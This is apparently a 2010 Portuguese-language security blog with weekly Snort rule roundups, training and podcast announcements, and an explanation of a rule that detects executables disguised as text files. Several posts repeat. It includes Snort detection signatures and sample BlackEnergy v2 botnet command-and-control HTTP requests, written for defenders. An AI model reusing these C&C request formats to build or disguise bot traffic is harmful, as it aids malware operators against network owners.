Caros,
Eu e o Marcos Aurélio ministraremos 2 treinamentos em parceria com a temporeal eventos , serão treinamentos de 1 dia realizados aos sabados :
OSSEC HIDS no dia 17 de Abril
Objetivo: O objetivo do Ossec Tutorial Mão na Massa Tempo Real Eventos é demonstrar como o OSSEC HIDS pode trabalhar para fornecer um grau de segurança apronfundado realizando integração com ativos de TI. Será abordado como a partir de analises de logs podemos obter informações que podem ajudar a prevenir futuros ataques ou interromper ataques em tempo real. Apresentar o que é e como funciona o sistema de detecção de rootkits, checagem de integridade do sistema de arquivos e resposta ativa. Explicação básica sobre utilização de decoders , regras e envio de alertas.
O Tutorial Ossec detalhará os diferentes tipos de instalação, entender os pré-requisitos para uma instalação bem sucedida de um sistema HIDS, como trabalhar com o correlacionamento de eventos dentro do OSSEC, como criar seus próprios correlacionamentos, como obter informações sobre eventos gerados pelo OSSEC através do OSSEC WUI.
Mais informações: http://www.temporealeventos.com.br/?area=175
Snort IDS no dia 08 de Maio de 2010
Objetivo: O Tutorial Mão na Massa Snort tem o objetivo de demonstrar o funcionamento do snort da seguinte maneira: como instalar, como gerenciar através de interface gráfica, como manter o sistema atualizado e como realizar testes periódicos. Será abirdado também o básico sobre escrita de assinaturas.
O Tutorial Snort Mão na Massa contemplará os ataques mais comuns e como funcionam, de maneira a gerar discussão sobre melhorias de performance, atualizacões e relatórios gráficos de ataques, tendências de problemas com invasão na sua rede, entre outros.
Mais informações: http://www.temporealeventos.com.br/?area=87
Nos vemos por lá =)
Rodrigo Montoro(Sp0oKeR)
terça-feira, 23 de março de 2010
domingo, 21 de março de 2010
Participação no podcast StaySafe edição 2
Caros,
Participei da gravação do segundo episódio do podcast StaySafe. Foi bem legal ter sido convidado e o bate papo foi bem interessante sobre IDS/Snort na maioria do tempo , mercado de trabalho entre outros.
Para quem quiser ouvir :
http://www.bordini.net/blog/?page_id=1478
Obrigado Jordan e Thiago pelo convite.
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
Participei da gravação do segundo episódio do podcast StaySafe. Foi bem legal ter sido convidado e o bate papo foi bem interessante sobre IDS/Snort na maioria do tempo , mercado de trabalho entre outros.
Para quem quiser ouvir :
http://www.bordini.net/blog/?page_id=1478
Obrigado Jordan e Thiago pelo convite.
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
segunda-feira, 8 de março de 2010
SRW - Snort Rules Week (VRT e ET) - edição 6 (01 Mar 2010/07 Mar 2010)
Esta semana tivemos como de costume várias regras adicionadas para proteção client-side tanto do VRT como do ET . Isso mostra como os atacantes estão cada vez mais criando formas de explorar o lado mais fraco da segurança, os usuários . Embora eu estivesse um pouco offline tentei me manter antenado nas regras e notícias da semana .
O VRT lançou os seguintes updates durante essa semana:
16453 <-> SPECIFIC-THREATS SMB Negotiate Protocol response DoS attempt - empty SMB 1 (specific-threats.rules, Medium)
16454 <-> SPECIFIC-THREATS SMB Negotiate Protocol response DoS attempt - empty SMB 2 (specific-threats.rules, Medium)
16455 <-> SPYWARE-PUT Keylogger egyspy keylogger 1.13 runtime detection (spyware-put.rules, Medium)
16456 <-> SPYWARE-PUT Rogue-Software ang antivirus 09 runtime detection (spyware-put.rules, High)
16457 <-> BACKDOOR Trojan.Downloader.Win32.Cutwail.AI runtime detection (backdoor.rules, High)
16458 <-> WEB-CLIENT Autonomy KeyView SDK Excel file SST parsing integer overflow attempt (web-client.rules, High)
16459 <-> SPECIFIC-THREATS Trojan command and control communication attempt (specific-threats.rules, High)
16460 <-> WEB-MISC text/html content-type without HTML - possible malware C&C (web-misc.rules, Medium
Os sid 16453 e 16454 são regras para proteção do cve,2009-3676 no qual ele busca um pacote na porta 445 com tamanho de 4 bytes que causaria DoS na negociação do protocolo SMB v1 e v2 . Se você usa o sensor em parte da rede que possui compartilhamento de arquivos ambas as regras devem ser utilizadas visto a facil exploração do DoS via scapy por exemplo.
Como sempre várias regras de Spywares , Backdoors e ameças especificas que como sempre saliento são interessantes para rodar caso seu sensor monitore seus usuários .
Para entendimento em especial da assinatura "WEB-MISC text/html content-type without HTML - possible malware C&C" recomendo que leiam esse ÓTIMO post feito pelo VRT da Sourcefire sobre Zeus/Zbot http://labs.snort.org/papers/zeus.html . Realmente essa regra é mandatória habilita-la mas cuidando para falsos positivos pois a regra pode gerar alertas para web sites mal desenvolvidos .
Lista completa das mudanças do VRT http://www.snort.org/vrt/docs/ruleset_changelogs/CURRENT/changes-2010-03-04.html
O Emerging-Threats por sua vez realizou as seguintes mudanças:
2010862 - ET WEB_SPECIFIC_APPS Possible APC Network Management Card Cross Site Scripting Attempt (emerging-web_specific_apps.rules)
2010863 - ET WEB_SERVER LANDesk Command Injection Attempt (emerging-web_server.rules)
2010864 - ET WEB_SERVER HP OpenView /OvCgi/Toolbar.exe Accept Language Heap Buffer Overflow Attempt (emerging-web_server.rules)
2010865 - ET WEB_SPECIFIC_APPS IBM Possible Lotus Domino readme.nsf Cross Site Scripting Attempt (emerging-web_specific_apps.rules)
2010866 - ET CURRENT_EVENTS Hostile domain, NeoSploit FakeAV google.analytics.com.*.info (emerging-current_events.rules)
2010867 - ET CURRENT_EVENTS Potential FakeAV download Setup_103s1 or Setup_207 variant (emerging-current_events.rules)
2010868 - ET USER_AGENTS Incorrectly formatted User-Agent string (dashes instead of semicolons) Likely Hostile (emerging-user_agents.rules)
2010869 - ET POLICY PE EXE or DLL Windows file download (2) (emerging-policy.rules)
2010870 - ET CURRENT_EVENTS NeoSploit Exploit Kit Java exploit drive-by host likely infected (kav) (emerging-current_events.rules)
2010871 - ET CURRENT_EVENTS NeoSploit Exploit Kit Java exploit drive-by host likely infected (nte) (emerging-current_events.rules)
2010872 - ET TROJAN Pragma\: hack Detected Outbound - Likely Infected Source (emerging-virus.rules)
2010873 - ET WEB_CLIENT Opera User-Agent Flowbit Set (emerging-web_client.rules)
2010874 - ET WEB_CLIENT Possible Opera Web Browser Content-Length Buffer Overflow Attempt (emerging-web_client.rules)
2010875 - ET TROJAN Blackenergy Bot Checkin to C&C (2) (emerging-virus.rules)
Outras várias que foram adicionadas para monitorar tráfego
2400009 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2404052 - ET DROP Known Bot C&C Server Traffic TCP (group 27) (emerging-botcc.rules)
2404053 - ET DROP Known Bot C&C Server Traffic UDP (group 27) (emerging-botcc.rules)
2406660 - ET RBN Known Russian Business Network IP TCP (331) (emerging-rbn.rules)
2406661 - ET RBN Known Russian Business Network IP UDP (331) (emerging-rbn.rules)
A regra ET POLICY PE EXE or DLL Windows file download embora muito interessante acredito que ocorra muito falso positivo visto que a mesma alertara para download de EXE válidos . Um regra legal é a que comentamos no último post "ET MALWARE Possible Windows executable sent when remote host claims to send a Text File" http://spookerlabs.blogspot.com/2010/03/possivel-executavel-windows-enviado.html .
Outra regra que monitora User-Agent anomalos seria a ET USER_AGENTS Incorrectly formatted User-Agent string (dashes instead of semicolons) Likely Hostile . Infelizmente monitorar User-Agent é algo complicado visto que existe milhares de UA e um simples espaço pode bypassar a regra devido a maiora das regras de UA não possuirem pcre por performance.
As regras de Current_Events podemos considerar algo para ameças momentaneas e ativa-las sempre pode identificar algo na sua rede =) .
Uma regra que li uma matéria muito legal foi sobre o Black Energy versão Trojan http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=223101487 no qual o ET criou a regra "ET TROJAN Blackenergy Bot Checkin to C&C (2)" . Se lerem o artigo poderão ver qual fantástico é a idéia da botnet e resultado final. Embora a mesma tenha em meta bancos da Russia e Ucrania a sua máquina pode ser útil para o possível ataque de DDoS, ou seja, não custa muito ativar a regra e ver o que ela pegara .
Analisando o post sobre Blackenergy2 http://www.secureworks.com/research/threats/blackenergy2/?threat=blackenergy2 enviei também para o ET duas sugestões de regras que foram aceitas :
POST /getcfg.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: example.com
Content-Length: 126
Pragma: no-cache
sksgh=E22EA13DA2170ACCC10CBA67C12ED8CB83774E032FC65BAEC5FA5CD826694619FABBF69297335C5A91BD02B2C7BB1E5AA0649991F2D6613888AD6749
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN BlackEnergy v2.x HTTP Request with Encrypted Variables"; flow:to_server,established; content:"POST "; depth:5; content:"/getcfg.php"; nocase; content:"sksgh="; distance:0; nocase; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2010875; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Blackenergy;reference:url,www.secureworks.com/research/threats/blackenergy2/?threat=blackenergy2; sid:XXXXXXX;)
BlackEnergy v2.x Plugin Download Request
POST /getcfg.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: example.com
Content-Length: 43
Pragma: no-cache
getp=ddos&id=xCOMP_3FA21CD8&ln=en&cn=US&nt=2600&bid=1
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN BlackEnergy v2.x Plugin Download Request"; flow:to_server,established; content:"POST "; depth:5; content:"/getcfg.php"; nocase; content:"getp=";content:"id=";content:"ln=";content:"bid=";content:"nt=";content:"cn=";classtype:trojan-activity; reference:url,doc.emergingthreats.net/2010875; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Blackenergy;reference:url,www.secureworks.com/research/threats/blackenergy2/?threat=blackenergy2; sid:XXXXXXX;)
Lista completa de mudanças do ET em http://lists.emergingthreats.net/pipermail/emerging-sigs/2010-March/006657.html
Espero que seja de grande utilidade a todos. Até a próxima semana.
Fiquem a vontade pra enviar dúvidas, sugestões e críticas, quero melhorar esse report a cada semana .
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
O VRT lançou os seguintes updates durante essa semana:
16453 <-> SPECIFIC-THREATS SMB Negotiate Protocol response DoS attempt - empty SMB 1 (specific-threats.rules, Medium)
16454 <-> SPECIFIC-THREATS SMB Negotiate Protocol response DoS attempt - empty SMB 2 (specific-threats.rules, Medium)
16455 <-> SPYWARE-PUT Keylogger egyspy keylogger 1.13 runtime detection (spyware-put.rules, Medium)
16456 <-> SPYWARE-PUT Rogue-Software ang antivirus 09 runtime detection (spyware-put.rules, High)
16457 <-> BACKDOOR Trojan.Downloader.Win32.Cutwail.AI runtime detection (backdoor.rules, High)
16458 <-> WEB-CLIENT Autonomy KeyView SDK Excel file SST parsing integer overflow attempt (web-client.rules, High)
16459 <-> SPECIFIC-THREATS Trojan command and control communication attempt (specific-threats.rules, High)
16460 <-> WEB-MISC text/html content-type without HTML - possible malware C&C (web-misc.rules, Medium
Os sid 16453 e 16454 são regras para proteção do cve,2009-3676 no qual ele busca um pacote na porta 445 com tamanho de 4 bytes que causaria DoS na negociação do protocolo SMB v1 e v2 . Se você usa o sensor em parte da rede que possui compartilhamento de arquivos ambas as regras devem ser utilizadas visto a facil exploração do DoS via scapy por exemplo.
Como sempre várias regras de Spywares , Backdoors e ameças especificas que como sempre saliento são interessantes para rodar caso seu sensor monitore seus usuários .
Para entendimento em especial da assinatura "WEB-MISC text/html content-type without HTML - possible malware C&C" recomendo que leiam esse ÓTIMO post feito pelo VRT da Sourcefire sobre Zeus/Zbot http://labs.snort.org/papers/zeus.html . Realmente essa regra é mandatória habilita-la mas cuidando para falsos positivos pois a regra pode gerar alertas para web sites mal desenvolvidos .
Lista completa das mudanças do VRT http://www.snort.org/vrt/docs/ruleset_changelogs/CURRENT/changes-2010-03-04.html
O Emerging-Threats por sua vez realizou as seguintes mudanças:
2010862 - ET WEB_SPECIFIC_APPS Possible APC Network Management Card Cross Site Scripting Attempt (emerging-web_specific_apps.rules)
2010863 - ET WEB_SERVER LANDesk Command Injection Attempt (emerging-web_server.rules)
2010864 - ET WEB_SERVER HP OpenView /OvCgi/Toolbar.exe Accept Language Heap Buffer Overflow Attempt (emerging-web_server.rules)
2010865 - ET WEB_SPECIFIC_APPS IBM Possible Lotus Domino readme.nsf Cross Site Scripting Attempt (emerging-web_specific_apps.rules)
2010866 - ET CURRENT_EVENTS Hostile domain, NeoSploit FakeAV google.analytics.com.*.info (emerging-current_events.rules)
2010867 - ET CURRENT_EVENTS Potential FakeAV download Setup_103s1 or Setup_207 variant (emerging-current_events.rules)
2010868 - ET USER_AGENTS Incorrectly formatted User-Agent string (dashes instead of semicolons) Likely Hostile (emerging-user_agents.rules)
2010869 - ET POLICY PE EXE or DLL Windows file download (2) (emerging-policy.rules)
2010870 - ET CURRENT_EVENTS NeoSploit Exploit Kit Java exploit drive-by host likely infected (kav) (emerging-current_events.rules)
2010871 - ET CURRENT_EVENTS NeoSploit Exploit Kit Java exploit drive-by host likely infected (nte) (emerging-current_events.rules)
2010872 - ET TROJAN Pragma\: hack Detected Outbound - Likely Infected Source (emerging-virus.rules)
2010873 - ET WEB_CLIENT Opera User-Agent Flowbit Set (emerging-web_client.rules)
2010874 - ET WEB_CLIENT Possible Opera Web Browser Content-Length Buffer Overflow Attempt (emerging-web_client.rules)
2010875 - ET TROJAN Blackenergy Bot Checkin to C&C (2) (emerging-virus.rules)
Outras várias que foram adicionadas para monitorar tráfego
2400009 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2404052 - ET DROP Known Bot C&C Server Traffic TCP (group 27) (emerging-botcc.rules)
2404053 - ET DROP Known Bot C&C Server Traffic UDP (group 27) (emerging-botcc.rules)
2406660 - ET RBN Known Russian Business Network IP TCP (331) (emerging-rbn.rules)
2406661 - ET RBN Known Russian Business Network IP UDP (331) (emerging-rbn.rules)
A regra ET POLICY PE EXE or DLL Windows file download embora muito interessante acredito que ocorra muito falso positivo visto que a mesma alertara para download de EXE válidos . Um regra legal é a que comentamos no último post "ET MALWARE Possible Windows executable sent when remote host claims to send a Text File" http://spookerlabs.blogspot.com/2010/03/possivel-executavel-windows-enviado.html .
Outra regra que monitora User-Agent anomalos seria a ET USER_AGENTS Incorrectly formatted User-Agent string (dashes instead of semicolons) Likely Hostile . Infelizmente monitorar User-Agent é algo complicado visto que existe milhares de UA e um simples espaço pode bypassar a regra devido a maiora das regras de UA não possuirem pcre por performance.
As regras de Current_Events podemos considerar algo para ameças momentaneas e ativa-las sempre pode identificar algo na sua rede =) .
Uma regra que li uma matéria muito legal foi sobre o Black Energy versão Trojan http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=223101487 no qual o ET criou a regra "ET TROJAN Blackenergy Bot Checkin to C&C (2)" . Se lerem o artigo poderão ver qual fantástico é a idéia da botnet e resultado final. Embora a mesma tenha em meta bancos da Russia e Ucrania a sua máquina pode ser útil para o possível ataque de DDoS, ou seja, não custa muito ativar a regra e ver o que ela pegara .
Analisando o post sobre Blackenergy2 http://www.secureworks.com/research/threats/blackenergy2/?threat=blackenergy2 enviei também para o ET duas sugestões de regras que foram aceitas :
POST /getcfg.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: example.com
Content-Length: 126
Pragma: no-cache
sksgh=E22EA13DA2170ACCC10CBA67C12ED8CB83774E032FC65BAEC5FA5CD826694619FABBF69297335C5A91BD02B2C7BB1E5AA0649991F2D6613888AD6749
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN BlackEnergy v2.x HTTP Request with Encrypted Variables"; flow:to_server,established; content:"POST "; depth:5; content:"/getcfg.php"; nocase; content:"sksgh="; distance:0; nocase; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2010875; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Blackenergy;reference:url,www.secureworks.com/research/threats/blackenergy2/?threat=blackenergy2; sid:XXXXXXX;)
BlackEnergy v2.x Plugin Download Request
POST /getcfg.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: example.com
Content-Length: 43
Pragma: no-cache
getp=ddos&id=xCOMP_3FA21CD8&ln=en&cn=US&nt=2600&bid=1
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN BlackEnergy v2.x Plugin Download Request"; flow:to_server,established; content:"POST "; depth:5; content:"/getcfg.php"; nocase; content:"getp=";content:"id=";content:"ln=";content:"bid=";content:"nt=";content:"cn=";classtype:trojan-activity; reference:url,doc.emergingthreats.net/2010875; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Blackenergy;reference:url,www.secureworks.com/research/threats/blackenergy2/?threat=blackenergy2; sid:XXXXXXX;)
Lista completa de mudanças do ET em http://lists.emergingthreats.net/pipermail/emerging-sigs/2010-March/006657.html
Espero que seja de grande utilidade a todos. Até a próxima semana.
Fiquem a vontade pra enviar dúvidas, sugestões e críticas, quero melhorar esse report a cada semana .
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
quinta-feira, 4 de março de 2010
Possivel Executável Windows enviado como arquivo texto - Detecção com Snort
Essa semana estou mais offline pois estou de micro férias e semana que vem com novidades. Mesmo offline o instinto nerds sempre me leva a olhar coisas do dia a dia .
Olhando o sidreporter nas estatísticas diárias ( http://www.emergingthreats.net/stats/index.html ) do dia de hoje (4 de Março de 2010) me deparei com o alerta "ET MALWARE Possible Windows executable sent when remote host claims to send a Text File" na décima primeira posição .
A regra abaixo é a responsável por gerar os alertas:
alert tcp any !20 -> $HOME_NET !25 (msg:"ET MALWARE Possible Windows executable sent when remote host claims to send a Text File"; flow: established,from_server; content:"Content-Type|3a| text/plain"; content:"|0d 0a|MZ"; within: 12; classtype: trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/2008438; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_Covert_Executable_DL; sid:2008438; rev:3;)
A mesma olha o tráfego tcp de portas de origem diferente da porta 20 (ftp-data) e sem ter o destino na porta 25(smtp) na sua HOME_NET. Após isso ele olha no cabeçalho por "Content-Type: text/plain" e pelo conteúdo "0d 0a" que é nova linha seguido de MZ. O MZ é o conteúdo inicial dos binários geralmente. Abaixo dois exemplos :
# cat notepad.exe | head -1
MZ@ ���``Wine placeholder DLLPE
# cat sidebr.exe | head -1
MZP ���@ � � �!� L�!��This program must be run under Win32
O primeiro exe (notepad.exe) é um binário simples, o segundo é um malware (sidebr.exe).
# clamscan notepad.exe
notepad.exe: OK
----------- SCAN SUMMARY -----------
Known viruses: 726013
Engine version: 0.95.3
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.09 MB
Data read: 0.08 MB (ratio 1.14:1)
Time: 1.264 sec (0 m 1 s)
notsecure:/#
# clamscan sidebr.exe
sidebr.exe: Trojan.Spy.Banker-5050 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 726013
Engine version: 0.95.3
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.88 MB
Data read: 4.62 MB (ratio 0.19:1)
Time: 1.435 sec (0 m 1 s)
notsecure:/#
Essa regra é realmente uma regra MUITO interessante em se ativar visto que muitos dos ataques que vem acontecendo os atacantes hospedam binários como txt para muitas vezes bypassar os filtros de conteúdo que na pratica analisam somente a extensão e não o real mime-type e tipo de arquivo.
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
Olhando o sidreporter nas estatísticas diárias ( http://www.emergingthreats.net/stats/index.html ) do dia de hoje (4 de Março de 2010) me deparei com o alerta "ET MALWARE Possible Windows executable sent when remote host claims to send a Text File" na décima primeira posição .
A regra abaixo é a responsável por gerar os alertas:
alert tcp any !20 -> $HOME_NET !25 (msg:"ET MALWARE Possible Windows executable sent when remote host claims to send a Text File"; flow: established,from_server; content:"Content-Type|3a| text/plain"; content:"|0d 0a|MZ"; within: 12; classtype: trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/2008438; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_Covert_Executable_DL; sid:2008438; rev:3;)
A mesma olha o tráfego tcp de portas de origem diferente da porta 20 (ftp-data) e sem ter o destino na porta 25(smtp) na sua HOME_NET. Após isso ele olha no cabeçalho por "Content-Type: text/plain" e pelo conteúdo "0d 0a" que é nova linha seguido de MZ. O MZ é o conteúdo inicial dos binários geralmente. Abaixo dois exemplos :
# cat notepad.exe | head -1
MZ@ ���``Wine placeholder DLLPE
# cat sidebr.exe | head -1
MZP ���@ � � �!� L�!��This program must be run under Win32
O primeiro exe (notepad.exe) é um binário simples, o segundo é um malware (sidebr.exe).
# clamscan notepad.exe
notepad.exe: OK
----------- SCAN SUMMARY -----------
Known viruses: 726013
Engine version: 0.95.3
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.09 MB
Data read: 0.08 MB (ratio 1.14:1)
Time: 1.264 sec (0 m 1 s)
notsecure:/#
# clamscan sidebr.exe
sidebr.exe: Trojan.Spy.Banker-5050 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 726013
Engine version: 0.95.3
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.88 MB
Data read: 4.62 MB (ratio 0.19:1)
Time: 1.435 sec (0 m 1 s)
notsecure:/#
Essa regra é realmente uma regra MUITO interessante em se ativar visto que muitos dos ataques que vem acontecendo os atacantes hospedam binários como txt para muitas vezes bypassar os filtros de conteúdo que na pratica analisam somente a extensão e não o real mime-type e tipo de arquivo.
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
segunda-feira, 1 de março de 2010
Novo Podcast Nacional - StaySafe - Edição 1
Meus amigos Thiago Bordini e Jordan Bonagura lançaram mais um podcast nacional sobre segurança da informação. Acho muito legal essa iniciativa pois o mercado é muito carente de podcasts na nossa área (lembrando o bom e velho I Shot The Sheriff http://www.naopod.com.br que praticamente é o unico) .
Segue abaixo as informações:
O Stay Safe tem como objetivo divulgar a área de Segurança da Informação entre os profissionais e não profissionais, discutir o mercado, noticias, novidades, desafios e eventos em geral.
Sempre iremos procurar trazer profissionais da área para discutirmos temas relevantes do mercado.
Diferentemente de outros canais, pretendemos discutir os assuntos relacionados de forma simples e descontraída, tornando o PodCast mais interativo e interessante para os ouvintes.
Os interessados em participar do programa, ou você que tem uma sugestão, crítica ou elogio pode entrar em contato conosco através do email staysafe@bordini.net
Para acessá-lo: http://www.bordini.net/blog/?page_id=1478
Enviem feedback para eles pois com isso sempre poderão melhorar formato, conteúdo ou o que acharem que for do interesse geral.
Sucesso para eles!
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
Segue abaixo as informações:
O Stay Safe tem como objetivo divulgar a área de Segurança da Informação entre os profissionais e não profissionais, discutir o mercado, noticias, novidades, desafios e eventos em geral.
Sempre iremos procurar trazer profissionais da área para discutirmos temas relevantes do mercado.
Diferentemente de outros canais, pretendemos discutir os assuntos relacionados de forma simples e descontraída, tornando o PodCast mais interativo e interessante para os ouvintes.
Os interessados em participar do programa, ou você que tem uma sugestão, crítica ou elogio pode entrar em contato conosco através do email staysafe@bordini.net
Para acessá-lo: http://www.bordini.net/blog/?page_id=1478
Enviem feedback para eles pois com isso sempre poderão melhorar formato, conteúdo ou o que acharem que for do interesse geral.
Sucesso para eles!
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
sábado, 27 de fevereiro de 2010
SRW - Snort Rules Week (VRT e ET) - edição 5 (22 Fev 2010/28 Fev 2010)
Essa semana embora mesmo sem os updates da Microsoft tanto Emerging-threats como VRT lançaram bastante regras novas. A grande maioria foi pra client-side o que mostra que as ameaças estão cada vez mais crescentes para os usuários .
O VRT durante essa semana lançou 2 updates das regras com novos conteudos listados abaixo.
16438 <-> ORACLE WebLogic Server Node Manager arbitrary command execution attempt (oracle.rules, High)
16439 <-> SPECIFIC-THREATS Possible Zeus User-Agent - _TEST_ (specific-threats.rules, High)
16440 <-> SPECIFIC-THREATS Possible Zeus User-Agent - ie (specific-threats.rules, High)
16441 <-> SPECIFIC-THREATS Possible Zeus User-Agent - Download (specific-threats.rules, High)
16442 <-> SPECIFIC-THREATS Possible Zeus User-Agent - Mozilla (specific-threats.rules, High)
16443 <-> CHAT deny Gmail chat DNS request (chat.rules, High)
16444 <-> SPECIFIC-THREAT HP StorageWorks storage mirroring double take service code execution attempt (specific-threats.rules, High)
16445 <-> SPECIFIC-THREATS Digium Asterisk IAX2 ack response denial of service attempt (specific-threats.rules, Medium)
16446 <-> RPC portmap Solaris sadmin tcp request (rpc.rules, Medium)
16447 <-> RPC portmap Solaris sadmin udp request (rpc.rules, Medium)
16448 <-> RPC portmap Solaris sadmin tcp adm_build_path overflow attempt (rpc.rules, Medium)
16449 <-> RPC portmap Solaris sadmin udp adm_build_path overflow attempt (rpc.rules, Medium)
16450 <-> SQL Jive Software Openfire Jabber Server SQL injection attempt (sql.rules, High)
16451 <-> WEB-CLIENT Palm WebOS 1.2.0 floating point exception denial of service attempt (web-client.rules, Medium)
Anúncio completo 23/02 http://www.snort.org/vrt/docs/ruleset_changelogs/CURRENT/changes-2010-02-23.html
16452 <-> WEB-CLIENT IE .hlp samba share download attempt (web-client.rules, High)
Anúncio completo 26/02 http://www.snort.org/vrt/docs/ruleset_changelogs/CURRENT/changes-2010-02-26.html
O VRT baseado na crescente ameaça do Zeus Botnet agora conhecida como Kneber e como citado no post anterior ( http://spookerlabs.blogspot.com/2010/02/zeus-botnet-snort-e-falsos-negativos.html ) lançou 4 regras adicionais para essa ameaça baseado no user-agent. Eu particularmente não sei como estas regras tem se comportado mas caso você tenha informações por favor nos informe. Como sugerido no outro post ativar essas regras é bem interessante:
16439 <-> SPECIFIC-THREATS Possible Zeus User-Agent - _TEST_ (specific-threats.rules, High)
16440 <-> SPECIFIC-THREATS Possible Zeus User-Agent - ie (specific-threats.rules, High)
16441 <-> SPECIFIC-THREATS Possible Zeus User-Agent - Download (specific-threats.rules, High)
16442 <-> SPECIFIC-THREATS Possible Zeus User-Agent - Mozilla (specific-threats.rules, High)
Tirando a regra do gmail "CHAT deny Gmail chat DNS request" que é mais generica (ele detecta a resposta negativa da requisição do DNS do chatenable.mail.google.com ) e talvez do seu interesse caso precise bloquear o uso do mesmo na sua empresa do resto é muito espefico a produtos o que so torna o uso necessário caso tenham alguns dos produtos .
A falha especial que mandaram o update no dia 26 para WEB-CLIENT IE .hlp samba share download attempt (web-client.rules, High) me chamou atenção por nao ter um reference. Basicamente ele procura pelo conteúdo vbscript e que a extensão seja .hlp com \ no match também . Seria algo novo que pegaram em seu laboratorio ? Muito bom ativar ela e ver o que acontece .
Regras da semana do Emerging Threats
2010831 - ET TROJAN Fake AV - Downloader likely malicious payload download src=xrun) (emerging-virus.rules)
2010832 - ET TROJAN Fake AV Generic Download landing) (emerging-virus.rules)
2010833 - ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt (emerging-web_specific_apps.rules)
2010834 - ET WEB_CLIENT Windows Defender ActiveX DeleteValue method Heap Overflow Attempt (emerging-web_client.rules)
2010835 - ET WEB_CLIENT Windows Defender ActiveX DeleteValue method Remote Code Execution Function Call (emerging-web_client.rules)
2010836 - ET WEB_CLIENT Windows Defender ActiveX WriteValue method Heap Overflow Attempt (emerging-web_client.rules)
2010837 - ET WEB_CLIENT Windows Defender ActiveX WriteValue method Remote Code Execution Function Call (emerging-web_client.rules)
2010838 - ET TROJAN WScript/VBScript XMLHTTP downloader likely malicious get?src= (emerging-virus.rules)
2010839 - ET WEB_CLIENT Possible Rising Online Virus Scanner ActiveX Control Scan() Method Stack Buffer Overflow Attempt (emerging-web_client.rules)
2010840 - ET WEB_CLIENT Viscom Software Movie Player Pro SDK ActiveX 6.8 Remote Buffer Overflow Attempt (emerging-web_client.rules)
2010841 - ET WEB_CLIENT DX Studio Player Firefox Plug-in Command Injection Attempt (emerging-web_client.rules)
2010842 - ET WEB_SPECIFIC Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt (emerging-web_specific_apps.rules)
2010843 - ET WEB_SPECIFIC Joomla com_avosbilletsy Component id Parameter SELECT FROM SQL Injection Attempt (emerging-web_specific_apps.rules)
2010844 - ET WEB_SPECIFIC Joomla com_avosbillets Component id Parameter DELETE FROM SQL Injection Attempt (emerging-web_specific_apps.rules)
2010845 - ET WEB_SPECIFIC Joomla com_avosbillets Component id Parameter UNION SELECT SQL Injection Attempt (emerging-web_specific_apps.rules)
2010846 - ET WEB_SPECIFIC Joomla com_avosbillets Component id Parameter INSERT INTO SQL Injection Attempt (emerging-web_specific_apps.rules)
2010847 - ET WEB_SPECIFIC_APPS com_if_nexus controller Parameter Remote File Inclusion Attempt (emerging-web_specific_apps.rules)
2010848 - ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt (emerging-web_specific_apps.rules)
2010851 - ET WEB_CLIENT Logitech VideoCall ActiveX Start method buffer overflow Attempt (emerging-web_client.rules)
2010852 - ET WEB_CLIENT WinDVD7 IASystemInfo.DLL ActiveX ApplicationType method buffer overflow Attempt (emerging-web_client.rules)
2010853 - ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter SELECT FROM SQL Injection Attempt (emerging-web_specific_apps.rules)
2010854 - ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter DELETE FROM SQL Injection Attempt (emerging-web_specific_apps.rules)
2010855 - ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UNION SELECT SQL Injection Attempt (emerging-web_specific_apps.rules)
